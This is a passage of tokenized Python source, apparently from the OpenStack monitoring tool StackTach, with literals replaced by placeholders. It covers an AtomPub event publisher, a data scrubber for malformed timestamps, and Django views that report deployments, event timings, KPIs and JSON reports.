[ ] <EOL> self . included_types = [ ] <EOL> self . excluded_types = [ ] <EOL> self . url = url <EOL> self . auth_user = auth_user <EOL> self . auth_key = auth_key <EOL> self . auth_server = auth_server <EOL> self . wait_interval = wait_interval <EOL> self . max_wait = max_wait <EOL> self . http_timeout = http_timeout <EOL> self . content_format = content_format <EOL> self . title = title <EOL> self . categories = categories <EOL> if extra_info : <EOL> self . extra_info = extra_info <EOL> else : <EOL> self . extra_info = { } <EOL> if event_types : <EOL> if isinstance ( event_types , six . string_types ) : <EOL> event_types = [ event_types ] <EOL> for t in event_types : <EOL> if t . startswith ( '<STR_LIT:!>' ) : <EOL> self . excluded_types . append ( t [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> self . included_types . append ( t ) <EOL> else : <EOL> self . included_types . append ( '<STR_LIT:*>' ) <EOL> if self . 
excluded_types and not self . included_types : <EOL> self . included_types . append ( '<STR_LIT:*>' ) <EOL> def _included_type ( self , event_type ) : <EOL> return any ( fnmatch . fnmatch ( event_type , t ) for t in self . included_types ) <EOL> def _excluded_type ( self , event_type ) : <EOL> return any ( fnmatch . fnmatch ( event_type , t ) for t in self . excluded_types ) <EOL> def match_type ( self , event_type ) : <EOL> return ( self . _included_type ( event_type ) <EOL> and not self . _excluded_type ( event_type ) ) <EOL> def handle_events ( self , events , env ) : <EOL> for event in events : <EOL> event_type = event [ '<STR_LIT>' ] <EOL> if self . match_type ( event_type ) : <EOL> self . events . append ( event ) <EOL> logger . debug ( "<STR_LIT>" % len ( self . events ) ) <EOL> return events <EOL> def commit ( self ) : <EOL> for event in self . events : <EOL> event_type = event . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> message_id = event . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> status = self . publish_event ( event ) <EOL> logger . debug ( "<STR_LIT>" % ( event_type , <EOL> message_id , <EOL> status ) ) <EOL> except Exception : <EOL> original_message_id = event . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . exception ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( event_type , <EOL> message_id , <EOL> original_message_id ) ) <EOL> def publish_event ( self , event ) : <EOL> content , content_type = self . format ( event ) <EOL> event_type = self . get_event_type ( event . get ( '<STR_LIT>' ) ) <EOL> atom = self . generate_atom ( event , event_type , content , content_type , <EOL> title = self . title , categories = self . categories ) <EOL> logger . debug ( "<STR_LIT>" % atom ) <EOL> return self . 
_send_event ( atom ) <EOL> def generate_atom ( self , event , event_type , content , content_type , <EOL> categories = None , title = None ) : <EOL> template = ( """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" ) <EOL> if title is None : <EOL> title = event_type <EOL> if categories is None : <EOL> cats = [ ] <EOL> else : <EOL> cats = categories [ : ] <EOL> cats . append ( event_type ) <EOL> original_message_id = event . get ( '<STR_LIT>' ) <EOL> if original_message_id is not None : <EOL> cats . append ( '<STR_LIT>' % original_message_id ) <EOL> cattags = '<STR_LIT>' . join ( """<STR_LIT>""" % cat <EOL> for cat in cats ) <EOL> info = dict ( message_id = event . get ( '<STR_LIT>' ) , <EOL> original_message_id = original_message_id , <EOL> event = event , <EOL> event_type = event_type , <EOL> content = content , <EOL> categories = cattags , <EOL> title = title , <EOL> content_type = content_type ) <EOL> return template % info <EOL> def get_event_type ( self , event_type ) : <EOL> etf = getattr ( self , '<STR_LIT>' % self . content_format , None ) <EOL> if etf : <EOL> return etf ( event_type ) <EOL> return event_type <EOL> def event_type_cuf_xml ( self , event_type ) : <EOL> return event_type + "<STR_LIT>" <EOL> def format ( self , event ) : <EOL> eff = getattr ( self , '<STR_LIT>' % self . content_format , None ) <EOL> if eff is None : <EOL> eff = getattr ( self , '<STR_LIT>' ) <EOL> return eff ( event ) <EOL> def format_json ( self , event ) : <EOL> c = json . dumps ( event ) <EOL> return ( c , '<STR_LIT:application/json>' ) <EOL> def format_cuf_xml ( self , event ) : <EOL> tvals = collections . defaultdict ( lambda : '<STR_LIT>' ) <EOL> tvals . update ( event ) <EOL> tvals . update ( self . extra_info ) <EOL> start_time , end_time = self . _get_times ( event ) <EOL> tvals [ '<STR_LIT>' ] = self . _format_time ( start_time ) <EOL> tvals [ '<STR_LIT>' ] = self . 
_format_time ( end_time ) <EOL> tvals [ '<STR_LIT:status>' ] = self . _get_status ( event ) <EOL> tvals [ '<STR_LIT>' ] = self . _get_options ( event ) <EOL> c = cuf_template % tvals <EOL> return ( c , '<STR_LIT>' ) <EOL> def _get_options ( self , event ) : <EOL> opt = int ( event . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> flags = [ bool ( opt & ( <NUM_LIT:2> ** i ) ) for i in range ( <NUM_LIT:8> ) ] <EOL> os = '<STR_LIT>' <EOL> app = None <EOL> if flags [ <NUM_LIT:0> ] : <EOL> os = '<STR_LIT>' <EOL> if flags [ <NUM_LIT:2> ] : <EOL> os = '<STR_LIT>' <EOL> if flags [ <NUM_LIT:6> ] : <EOL> os = '<STR_LIT>' <EOL> if flags [ <NUM_LIT:3> ] : <EOL> app = '<STR_LIT>' <EOL> if flags [ <NUM_LIT:5> ] : <EOL> app = '<STR_LIT>' <EOL> if app is None : <EOL> return '<STR_LIT>' % os <EOL> else : <EOL> return '<STR_LIT>' % ( os , app ) <EOL> def _get_status ( self , event ) : <EOL> state = event . get ( '<STR_LIT:state>' ) <EOL> state_description = event . get ( '<STR_LIT>' ) <EOL> status = '<STR_LIT>' <EOL> status_map = { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT:error>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> if state in status_map : <EOL> status = status_map [ state ] <EOL> if state == '<STR_LIT>' : <EOL> if state_description == '<STR_LIT>' : <EOL> status = '<STR_LIT>' <EOL> else : <EOL> status = '<STR_LIT>' <EOL> if state == '<STR_LIT>' : <EOL> active_map = { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" 
: '<STR_LIT>' , <EOL> } <EOL> status = active_map . get ( state_description , '<STR_LIT>' ) <EOL> if status == '<STR_LIT>' : <EOL> logger . error ( "<STR_LIT>" % ( <EOL> event . get ( '<STR_LIT>' ) , state , state_description ) ) <EOL> return status <EOL> def _get_times ( self , event ) : <EOL> audit_period_beginning = event . get ( '<STR_LIT>' ) <EOL> audit_period_ending = event . get ( '<STR_LIT>' ) <EOL> launched_at = event . get ( '<STR_LIT>' ) <EOL> terminated_at = event . get ( '<STR_LIT>' ) <EOL> if not terminated_at : <EOL> terminated_at = event . get ( '<STR_LIT>' ) <EOL> start_time = max ( launched_at , audit_period_beginning ) <EOL> if not terminated_at : <EOL> end_time = audit_period_ending <EOL> else : <EOL> end_time = min ( terminated_at , audit_period_ending ) <EOL> if start_time > end_time : <EOL> start_time = audit_period_beginning <EOL> return ( start_time , end_time ) <EOL> def _format_time ( self , dt ) : <EOL> time_format = "<STR_LIT>" <EOL> if dt : <EOL> return datetime . datetime . strftime ( dt , time_format ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def _get_auth ( self , force = False , headers = None ) : <EOL> if headers is None : <EOL> headers = { } <EOL> if force or not AtomPubHandler . auth_token_cache : <EOL> auth_body = { "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:username>" : self . auth_user , <EOL> "<STR_LIT>" : self . auth_key , <EOL> } } } <EOL> auth_headers = { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:application/json>" , <EOL> "<STR_LIT:Content-Type>" : "<STR_LIT:application/json>" } <EOL> logger . debug ( "<STR_LIT>" % self . auth_server ) <EOL> res = requests . post ( self . auth_server , <EOL> data = json . dumps ( auth_body ) , <EOL> headers = auth_headers ) <EOL> res . raise_for_status ( ) <EOL> token = res . json ( ) [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] <EOL> logger . debug ( "<STR_LIT>" % token ) <EOL> AtomPubHandler . 
auth_token_cache = token <EOL> headers [ "<STR_LIT>" ] = AtomPubHandler . auth_token_cache <EOL> return headers <EOL> def _send_event ( self , atom ) : <EOL> headers = { "<STR_LIT:Content-Type>" : "<STR_LIT>" } <EOL> headers = self . _get_auth ( headers = headers ) <EOL> attempts = <NUM_LIT:0> <EOL> status = <NUM_LIT:0> <EOL> while True : <EOL> try : <EOL> res = requests . post ( self . url , <EOL> data = atom , <EOL> headers = headers , <EOL> timeout = self . http_timeout ) <EOL> status = res . status_code <EOL> if status >= <NUM_LIT:200> and status < <NUM_LIT> : <EOL> break <EOL> if status == <NUM_LIT> : <EOL> logger . info ( "<STR_LIT>" ) <EOL> headers = self . _get_auth ( headers = headers , force = True ) <EOL> continue <EOL> if status == <NUM_LIT> : <EOL> logger . debug ( "<STR_LIT>" % atom ) <EOL> break <EOL> if status == <NUM_LIT> : <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % atom ) <EOL> break <EOL> except requests . exceptions . ConnectionError : <EOL> logger . exception ( "<STR_LIT>" % self . url ) <EOL> except requests . exceptions . Timeout : <EOL> logger . exception ( "<STR_LIT>" % self . url ) <EOL> except requests . exceptions . HTTPError : <EOL> logger . exception ( "<STR_LIT>" <EOL> "<STR_LIT:%s>" % self . url ) <EOL> except requests . exceptions . RequestException : <EOL> logger . exception ( "<STR_LIT>" % self . url ) <EOL> attempts += <NUM_LIT:1> <EOL> wait = min ( attempts * self . wait_interval , self . max_wait ) <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % str ( wait ) ) <EOL> time . sleep ( wait ) <EOL> return status <EOL> def rollback ( self ) : <EOL> pass </s>
<s> import json
import uuid

from django.db.models import F

from stacktach import models


# NOTE(review): all '<STR_LIT>' / <NUM_LIT> tokens below are corpus
# placeholders for the original literals; distinct strings may have been
# collapsed into identical tokens, so key/value semantics are inferred.
class ScrubberBase(object):
    # Base interface for a data scrubber operating over a [start, end)
    # time window.  Subclasses override raws()/filter()/scrub().
    def __init__(self, start, end):
        # start/end bound the window a subclass's raws() query uses.
        self.start = start
        self.end = end

    def raws(self):
        """<STR_LIT>"""
        # Default: no raw records; returns an (empty) iterator so callers
        # can always iterate the result.
        return [].__iter__()

    def filter(self, raw_data):
        """<STR_LIT>"""
        # Default: accept everything.  Returns (matched, parsed_body);
        # the base class never supplies a parsed body.
        return True, None

    def scrub(self, body):
        """<STR_LIT>"""
        # Default: identity transform.
        return body


class ExistsCreatedAt(ScrubberBase):
    # Scrubber targeting InstanceExists records whose embedded
    # 'created_at' payload needs rewriting (exact defect is hidden by
    # literal placeholders — presumably a malformed timestamp; verify
    # against the original source).
    def raws(self):
        # Yield the raw JSON of each InstanceExists row in the window.
        # The third filter compares a field against another field offset
        # by a constant product (placeholder numerals — likely a
        # seconds-per-day style offset; TODO confirm).
        filters = {
            '<STR_LIT>': self.start,
            '<STR_LIT>': self.end,
            '<STR_LIT>': F('<STR_LIT>') + (<NUM_LIT> * <NUM_LIT> * <NUM_LIT>)
        }
        exists = models.InstanceExists.objects.filter(**filters)
        # select_related avoids a per-row query for the related raw row.
        exists = exists.select_related('<STR_LIT>')
        for exist in exists.iterator():
            rawdata = exist.raw
            yield {'<STR_LIT>': rawdata.json}

    def filter(self, raw_data):
        # Cheap substring probe first; only then parse the JSON payload.
        if '<STR_LIT>' in raw_data['<STR_LIT>']:
            # The notification JSON is a 2-element envelope; index 1 is
            # the message body.
            body = json.loads(raw_data['<STR_LIT>'])[<NUM_LIT:1>]
            created_at = body.get('<STR_LIT>', {}).get('<STR_LIT>')
            # Match only when created_at exists AND contains the marker
            # substring being scrubbed out.
            if created_at and '<STR_LIT>' in created_at:
                return True, body
            else:
                return False, None
        else:
            return False, None

    def scrub(self, body):
        # Replace the offending fragment inside created_at and stamp a
        # fresh message id so the re-emitted event is unique.
        created_at = body['<STR_LIT>']['<STR_LIT>']
        scrubbed_created_at = created_at.replace('<STR_LIT>', '<STR_LIT>')
        body['<STR_LIT>']['<STR_LIT>'] = scrubbed_created_at
        body['<STR_LIT>'] = str(uuid.uuid4())
        return body </s>
<s> from copy import deepcopy
import decimal
import datetime
import json

from django.db.models import Q
from django.http import HttpResponse
from django.shortcuts import get_object_or_404

import datetime_to_decimal as dt
import models
import utils
from django.core.exceptions import ObjectDoesNotExist, FieldError, ValidationError

# NOTE(review): this module is Python 2 code (it uses dict.iteritems and
# relies on integer division in sec_to_time).  All '<STR_LIT*>' /
# <NUM_LIT*> tokens are corpus placeholders for the original literals.

SECS_PER_HOUR = <NUM_LIT> * <NUM_LIT>
SECS_PER_DAY = SECS_PER_HOUR * <NUM_LIT>
# Pagination bounds for list endpoints.
DEFAULT_LIMIT = <NUM_LIT:50>
HARD_LIMIT = <NUM_LIT:1000>
UTC_FORMAT = '<STR_LIT>'


# Read the page-size limit from the query string, clamped to HARD_LIMIT.
def _get_limit(request):
    limit = request.GET.get('<STR_LIT>', DEFAULT_LIMIT)
    if limit:
        limit = int(limit)
        if limit > HARD_LIMIT:
            limit = HARD_LIMIT
    return limit


# Translate limit/offset query params into a (start, end) slice pair.
# start is None when no offset was given (slice from the beginning).
def _get_query_range(request):
    limit = _get_limit(request)
    offset = request.GET.get('<STR_LIT>')
    start = None
    if offset:
        start = int(offset)
    else:
        offset = <NUM_LIT:0>
    end = int(offset) + int(limit)
    return start, end


# Central queryset builder: applies select_related, filters, excludes,
# ordering, then the request's pagination slice.  `excludes` entries may
# be dicts (keyword excludes) or Q objects.
def model_search(request, model, filters,
                 related=False, order_by=None, excludes=None):
    query = model
    if related:
        query = query.select_related()
    if filters:
        query = query.filter(**filters)
    else:
        query = query.all()
    if excludes:
        for exclude in excludes:
            if isinstance(exclude, dict):
                query = query.exclude(**exclude)
            else:
                query = query.exclude(exclude)
    if order_by:
        query = query.order_by(order_by)
    start, end = _get_query_range(request)
    query = query[start:end]
    return query


# Add optional when-range bounds (decimal timestamps) from the query
# string into `filters` in place.
def _add_when_filters(request, filters):
    when_max = request.GET.get('<STR_LIT>')
    if when_max:
        filters['<STR_LIT>'] = decimal.Decimal(when_max)
    when_min = request.GET.get('<STR_LIT>')
    if when_min:
        filters['<STR_LIT>'] = decimal.Decimal(when_min)


# Distinct event names recorded for one service's raw-data model.
def get_event_names(service='<STR_LIT>'):
    return _model_factory(service).values('<STR_LIT>').distinct()


# Union of distinct event names across all known services.
def get_all_event_names():
    services = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
    events = []
    for service in services:
        events.extend(get_event_names(service))
    return events


# Distinct host names recorded for one service's raw-data model.
def get_host_names(service):
    return _model_factory(service).values('<STR_LIT:host>').distinct()


# One-character marker used in listings: 'E' for error routing keys.
def routing_key_type(key):
    if key.endswith('<STR_LIT:error>'):
        return '<STR_LIT:E>'
    return '<STR_LIT:U+0020>'


def get_deployments():
    return models.Deployment.objects.all().order_by('<STR_LIT:name>')


# Build a timing table for every Lifecycle matching `uuid`.  State
# column: 'S' = start seen, 'E' = end seen, '.' = both (duration shown).
def get_timings_for_uuid(request, uuid):
    model = models.Lifecycle.objects
    filters = {'<STR_LIT>': uuid}
    lifecycles = model_search(request, model, filters)
    results = [["<STR_LIT:?>", "<STR_LIT>", "<STR_LIT>"]]
    for lc in lifecycles:
        timings = models.Timing.objects.filter(lifecycle=lc)
        if not timings:
            continue
        for t in timings:
            state = "<STR_LIT:?>"
            show_time = '<STR_LIT>'
            if t.start_raw:
                state = '<STR_LIT:S>'
            if t.end_raw:
                state = '<STR_LIT:E>'
            if t.start_raw and t.end_raw:
                state = "<STR_LIT:.>"
                show_time = sec_to_time(t.diff)
            results.append([state, t.name, show_time])
    return results


# Render a (possibly fractional) second count as days/hours/minutes/
# seconds plus a truncated fraction.  Relies on Python 2 integer
# division for days/hours/minutes.
def sec_to_time(diff):
    seconds = int(diff)
    usec = diff - seconds
    days = seconds / SECS_PER_DAY
    seconds -= (days * SECS_PER_DAY)
    hours = seconds / SECS_PER_HOUR
    seconds -= (hours * SECS_PER_HOUR)
    minutes = seconds / <NUM_LIT>
    seconds -= (minutes * <NUM_LIT>)
    # Keep only the leading fractional digits of usec (drop the "0").
    usec = str(usec)[<NUM_LIT:1>:<NUM_LIT:4>]
    return "<STR_LIT>" % (days, hours, minutes, seconds, usec)


# Thin HttpResponse wrapper; callers pass pre-serialized bodies.
def rsp(data, status=<NUM_LIT:200>, content_type="<STR_LIT:application/json>"):
    return HttpResponse(data, content_type=content_type, status=status)


# Uniform JSON error payload: header row plus [type, message].
def error_response(status, type, message):
    results = [["<STR_LIT>", "<STR_LIT>"], [type, message]]
    return rsp(json.dumps(results), status)


def do_deployments(request):
    deployments = get_deployments()
    results = [["<STR_LIT:#>", "<STR_LIT:Name>"]]
    for deployment in deployments:
        results.append([deployment.id, deployment.name])
    return rsp(json.dumps(results))


# List event names, optionally restricted to one service.
def do_events(request):
    service = str(request.GET.get('<STR_LIT>', '<STR_LIT:all>'))
    if service == '<STR_LIT:all>':
        events = get_all_event_names()
    else:
        events = get_event_names(service=service)
    results = [["<STR_LIT>"]]
    for event in events:
        results.append([event['<STR_LIT>']])
    return rsp(json.dumps(results))


def do_hosts(request):
    service = str(request.GET.get('<STR_LIT>', '<STR_LIT>'))
    hosts = get_host_names(service)
    results = [["<STR_LIT>"]]
    for host in hosts:
        results.append([host['<STR_LIT:host>']])
    return rsp(json.dumps(results))


# All raw events for one instance/image uuid, newest-filterable via
# when_min/when_max, rendered via each row's search_results().
def do_uuid(request):
    uuid = str(request.GET['<STR_LIT>'])
    service = str(request.GET.get('<STR_LIT>', '<STR_LIT>'))
    if not utils.is_uuid_like(uuid):
        msg = "<STR_LIT>" % uuid
        return error_response(<NUM_LIT>, '<STR_LIT>', msg)
    model = _model_factory(service)
    result = []
    filters = {}
    # The uuid lives under a different column name per service.
    if service == '<STR_LIT>' or service == '<STR_LIT>':
        filters = {'<STR_LIT>': uuid}
    if service == '<STR_LIT>':
        filters = {'<STR_LIT>': uuid}
    _add_when_filters(request, filters)
    related = model_search(request, model, filters,
                           related=True, order_by='<STR_LIT>')
    for event in related:
        when = dt.dt_from_decimal(event.when)
        routing_key_status = routing_key_type(event.routing_key)
        # search_results() accumulates display rows onto `result`.
        result = event.search_results(result, when, routing_key_status)
    return rsp(json.dumps(result))


def do_timings_uuid(request):
    uuid = request.GET['<STR_LIT>']
    if not utils.is_uuid_like(uuid):
        msg = "<STR_LIT>" % uuid
        return error_response(<NUM_LIT>, '<STR_LIT>', msg)
    results = get_timings_for_uuid(request, uuid)
    return rsp(json.dumps(results))


# Completed timings (both start and end raws present) for one event
# name, optionally bounded by a when range.
def do_timings(request):
    name = request.GET['<STR_LIT:name>']
    model = models.Timing.objects
    filters = {
        '<STR_LIT:name>': name
    }
    if request.GET.get('<STR_LIT>') is not None:
        min_when = decimal.Decimal(request.GET['<STR_LIT>'])
        filters['<STR_LIT>'] = min_when
    if request.GET.get('<STR_LIT>') is not None:
        max_when = decimal.Decimal(request.GET['<STR_LIT>'])
        filters['<STR_LIT>'] = max_when
    # Drop half-open timings (missing either endpoint).
    excludes = [Q(start_raw=None) | Q(end_raw=None), ]
    timings = model_search(request, model, filters,
                           excludes=excludes, related=True,
                           order_by='<STR_LIT>')
    results = [[name, "<STR_LIT>"]]
    for t in timings:
        results.append([t.lifecycle.instance, sec_to_time(t.diff)])
    return rsp(json.dumps(results))


# Min/max/average duration per "interesting" event (names ending in a
# given suffix, trimmed off for display).
def do_summary(request):
    events = get_event_names()
    interesting = []
    for e in events:
        ev = e['<STR_LIT>']
        if ev.endswith('<STR_LIT>'):
            interesting.append(ev[:-len('<STR_LIT>')])
    results = [["<STR_LIT>", "<STR_LIT:N>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>"]]
    for name in interesting:
        model = models.Timing.objects
        filters = {'<STR_LIT:name>': name}
        excludes = [
            Q(start_raw=None) | Q(end_raw=None),
            {'<STR_LIT>': <NUM_LIT:0>}
        ]
        timings = model_search(request, model, filters,
                               excludes=excludes)
        if not timings:
            continue
        total, _min, _max = <NUM_LIT:0.0>, None, None
        num = len(timings)
        for t in timings:
            seconds = float(t.diff)
            total += seconds
            if _min is None:
                _min = seconds
            if _max is None:
                _max = seconds
            _min = min(_min, seconds)
            _max = max(_max, seconds)
        results.append([name, int(num), sec_to_time(_min),
                        sec_to_time(_max), sec_to_time(int(total / num))])
    return rsp(json.dumps(results))


# All raw events sharing one request id, in when order.
def do_request(request):
    request_id = request.GET['<STR_LIT>']
    if not utils.is_request_id_like(request_id):
        msg = "<STR_LIT>" % request_id
        return error_response(<NUM_LIT>, '<STR_LIT>', msg)
    model = models.RawData.objects
    filters = {'<STR_LIT>': request_id}
    _add_when_filters(request, filters)
    events = model_search(request, model, filters, order_by='<STR_LIT>')
    results = [["<STR_LIT:#>", "<STR_LIT:?>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
                "<STR_LIT>", "<STR_LIT>", "<STR_LIT>"]]
    for e in events:
        when = dt.dt_from_decimal(e.when)
        results.append([e.id, routing_key_type(e.routing_key), str(when),
                        e.deployment.name, e.event, e.host, e.state,
                        e.old_state, e.old_task])
    return rsp(json.dumps(results))


# The three append_*_raw_attributes helpers flatten one raw event into
# [label, value] rows; they differ only in the service-specific columns
# (nova: state/instance, glance: status/uuid).
def append_nova_raw_attributes(event, results):
    results.append(["<STR_LIT>", "<STR_LIT>"])
    results.append(["<STR_LIT:#>", event.id])
    when = dt.dt_from_decimal(event.when)
    results.append(["<STR_LIT>", str(when)])
    results.append(["<STR_LIT>", event.deployment.name])
    results.append(["<STR_LIT>", event.routing_key])
    results.append(["<STR_LIT>", event.publisher])
    results.append(["<STR_LIT>", event.state])
    results.append(["<STR_LIT>", event.event])
    results.append(["<STR_LIT>", event.service])
    results.append(["<STR_LIT>", event.host])
    results.append(["<STR_LIT>", event.instance])
    results.append(["<STR_LIT>", event.request_id])
    return results


def append_glance_raw_attributes(event, results):
    results.append(["<STR_LIT>", "<STR_LIT>"])
    results.append(["<STR_LIT:#>", event.id])
    when = dt.dt_from_decimal(event.when)
    results.append(["<STR_LIT>", str(when)])
    results.append(["<STR_LIT>", event.deployment.name])
    results.append(["<STR_LIT>", event.routing_key])
    results.append(["<STR_LIT>", event.publisher])
    results.append(["<STR_LIT>", event.status])
    results.append(["<STR_LIT>", event.event])
    results.append(["<STR_LIT>", event.service])
    results.append(["<STR_LIT>", event.host])
    results.append(["<STR_LIT>", event.uuid])
    results.append(["<STR_LIT>", event.request_id])
    return results


def append_generic_raw_attributes(event, results):
    results.append(["<STR_LIT>", "<STR_LIT>"])
    results.append(["<STR_LIT:#>", event.id])
    when = dt.dt_from_decimal(event.when)
    results.append(["<STR_LIT>", str(when)])
    results.append(["<STR_LIT>", event.deployment.name])
    results.append(["<STR_LIT>", event.routing_key])
    results.append(["<STR_LIT>", event.publisher])
    results.append(["<STR_LIT>", event.state])
    results.append(["<STR_LIT>", event.event])
    results.append(["<STR_LIT>", event.service])
    results.append(["<STR_LIT>", event.host])
    results.append(["<STR_LIT>", event.instance])
    results.append(["<STR_LIT>", event.request_id])
    return results


# Dispatch to the per-service attribute flattener.  NOTE(review):
# returns None for an unrecognized service string.
def _append_raw_attributes(event, results, service):
    if service == '<STR_LIT>':
        return append_nova_raw_attributes(event, results)
    if service == '<STR_LIT>':
        return append_glance_raw_attributes(event, results)
    if service == '<STR_LIT>':
        return append_generic_raw_attributes(event, results)


# Detail view for a single raw event: attribute rows, pretty-printed
# JSON payload, and the row's uuid.  Missing id -> empty response body.
def do_show(request, event_id):
    service = str(request.GET.get('<STR_LIT>', '<STR_LIT>'))
    event_id = int(event_id)
    results = []
    model = _model_factory(service)
    try:
        event = model.get(id=event_id)
        results = _append_raw_attributes(event, results, service)
        final = [results, ]
        j = json.loads(event.json)
        final.append(json.dumps(j, indent=<NUM_LIT:2>))
        final.append(event.uuid)
        return rsp(json.dumps(final))
    except ObjectDoesNotExist:
        return rsp({})


# Map a service name to its raw-data model manager.  NOTE(review):
# returns None for an unknown service.
def _model_factory(service):
    if service == '<STR_LIT>':
        return models.GlanceRawData.objects
    elif service == '<STR_LIT>':
        return models.RawData.objects
    elif service == '<STR_LIT>':
        return models.GenericRawData.objects


# Polling endpoint: events since `since` (or the last ~2 seconds) up to
# "now", optionally filtered by deployment and event name.  Returns
# [column_widths, rows, now] so the client can resume from `now`.
def do_watch(request, deployment_id):
    service = str(request.GET.get('<STR_LIT>', '<STR_LIT>'))
    model = _model_factory(service)
    deployment_id = int(deployment_id)
    since = request.GET.get('<STR_LIT>')
    event_name = request.GET.get('<STR_LIT>')
    deployment_map = {}
    for d in get_deployments():
        deployment_map[d.id] = d
    events = get_event_names()
    # Widest event name drives the event column width sent to the client.
    max_event_width = max([len(event['<STR_LIT>']) for event in events])
    base_events = model.order_by('<STR_LIT>')
    if deployment_id > <NUM_LIT:0>:
        base_events = base_events.filter(deployment=deployment_id)
    if event_name:
        base_events = base_events.filter(event=event_name)
    # Truncate to whole seconds so the resume token is stable.
    now = datetime.datetime.utcnow()
    now = now.replace(microsecond=<NUM_LIT:0>)
    dec_now = dt.dt_to_decimal(now)
    if since:
        since = decimal.Decimal(since)
    else:
        since = now - datetime.timedelta(seconds=<NUM_LIT:2>)
        since = dt.dt_to_decimal(since)
    base_events = base_events.filter(when__gt=since)
    events = base_events.filter(when__lte=dec_now)
    # Fixed column widths for the client-side table renderer.
    c = [<NUM_LIT:10>, <NUM_LIT:1>, <NUM_LIT:15>, <NUM_LIT:20>, max_event_width, <NUM_LIT>]
    results = []
    for raw in events:
        uuid = raw.uuid
        if not uuid:
            uuid = "<STR_LIT:->"
        typ = routing_key_type(raw.routing_key)
        when = dt.dt_from_decimal(raw.when)
        results.append([raw.id, typ,
                        str(when.date()), str(when.time()),
                        deployment_map[raw.deployment.id].name,
                        raw.event,
                        uuid])
    results_json = json.dumps([c, results, str(dec_now)])
    return rsp(results_json)


# KPI listing: durations of request trackers completed in the last day,
# optionally restricted to one tenant (404s if the tenant is unknown).
def do_kpi(request, tenant_id=None):
    if tenant_id:
        if models.RawData.objects.filter(tenant=tenant_id).count() == <NUM_LIT:0>:
            message = "<STR_LIT>" % tenant_id
            return error_response(<NUM_LIT>, '<STR_LIT>', message)
    yesterday = datetime.datetime.utcnow() - datetime.timedelta(days=<NUM_LIT:1>)
    yesterday = dt.dt_to_decimal(yesterday)
    trackers = models.RequestTracker.objects.select_related().exclude(last_timing=None).exclude(start__lt=yesterday).order_by('<STR_LIT>')
    results = [["<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>"]]
    for track in trackers:
        end_event = track.last_timing.end_raw
        # Trim the terminal suffix off the event name for display.
        event = end_event.event[:-len("<STR_LIT>")]
        uuid = track.lifecycle.instance
        if tenant_id is None or (tenant_id == end_event.tenant):
            results.append([event, sec_to_time(track.duration),
                            uuid, end_event.deployment.name])
    return rsp(json.dumps(results))


# JSON reports created within a period range (defaults: last 24 hours).
def do_jsonreports(request):
    yesterday = datetime.datetime.utcnow() - datetime.timedelta(days=<NUM_LIT:1>)
    now = datetime.datetime.utcnow()
    yesterday = dt.dt_to_decimal(yesterday)
    now = dt.dt_to_decimal(now)
    _from = request.GET.get('<STR_LIT>', yesterday)
    _to = request.GET.get('<STR_LIT>', now)
    model = models.JsonReport.objects
    filters = {
        '<STR_LIT>': _from,
        '<STR_LIT>': _to
    }
    reports = model_search(request, model, filters)
    results = [['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:Name>', '<STR_LIT>']]
    for report in reports:
        results.append([report.id,
                        float(dt.dt_to_decimal(report.period_start)),
                        float(dt.dt_to_decimal(report.period_end)),
                        float(report.created),
                        report.name,
                        report.version])
    return rsp(json.dumps(results))


# Raw JSON body of a single stored report (404 if absent).
def do_jsonreport(request, report_id):
    report_id = int(report_id)
    report = get_object_or_404(models.JsonReport, pk=report_id)
    return rsp(report.json)


# Generic field=value search over one service's raw data.  FieldError
# (bad field name) is turned into a client error response.
def search(request):
    service = str(request.GET.get('<STR_LIT>', '<STR_LIT>'))
    field = request.GET.get('<STR_LIT>')
    value = request.GET.get('<STR_LIT:value>')
    model = _model_factory(service)
    filters = {field: value}
    _add_when_filters(request, filters)
    results = []
    try:
        events = model_search(request, model, filters, order_by='<STR_LIT>')
        for event in events:
            when = dt.dt_from_decimal(event.when)
            routing_key_status = routing_key_type(event.routing_key)
            results = event.search_results(results, when, routing_key_status)
        return rsp(json.dumps(results))
    except ObjectDoesNotExist:
        return error_response(<NUM_LIT>, '<STR_LIT>', ["<STR_LIT>"])
    except FieldError:
        return error_response(<NUM_LIT>, '<STR_LIT>', "<STR_LIT>"
